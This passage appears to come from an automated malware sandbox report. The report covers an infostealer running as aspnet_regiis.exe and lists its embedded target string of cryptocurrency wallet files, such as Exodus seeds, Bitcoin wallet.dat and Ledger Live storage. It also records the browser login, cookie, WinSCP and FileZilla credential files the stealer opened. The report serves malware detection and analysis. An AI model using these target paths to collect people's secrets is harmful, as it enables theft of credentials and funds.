Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

